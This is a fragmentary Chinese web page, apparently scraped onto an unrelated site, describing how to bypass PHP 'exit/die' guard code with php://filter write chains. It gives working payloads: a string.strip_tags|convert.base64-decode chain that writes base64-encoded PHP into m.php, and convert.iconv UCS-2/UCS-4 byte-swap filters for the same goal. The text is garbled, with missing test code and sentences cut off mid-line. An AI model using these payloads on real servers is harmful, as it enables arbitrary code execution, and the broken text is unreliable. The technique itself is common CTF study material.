伪协议绕过死亡代码 |
您所在的位置:网站首页 › php die exit › 伪协议绕过死亡代码 |
|
测试代码如下: 主要思路:利用php伪协议的写过滤器,对即将要写的内容(content)进行处理后,会将 (3)组合(String Filters+Conversion Filters) ?file=php://filter/write=string.strip_tags|convert.base64-decode/resource=m.php content=?>PD9waHAgcGhwaW5mbygpOw== (4)(Conversion Filters:convert.iconv.*:) 利用: php://filter/convert.iconv.UCS-2BE.UCS-2LE/resource=m.php or php://filter/convert.iconv.UCS-4BE.UCS-4LE/resource=m.php解释: 通过UCS-2或者UCS-4的方式,对目标字符串进行2/4位一反转,也就是说构造的content字节数需要是UCS-2或UCS-4中2或者4的倍数,不然不能进行反转,那我们就可以利用这种过滤器进行编码转换绕过了。我们利用如下方法构造我们需要的payload。(注意倍数问题,否则输出错误。) echo iconv('UCS-2LE','UCS-2BE',''); //?? echo iconv('UCS-4LE','UCS-4BE',' |
| CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |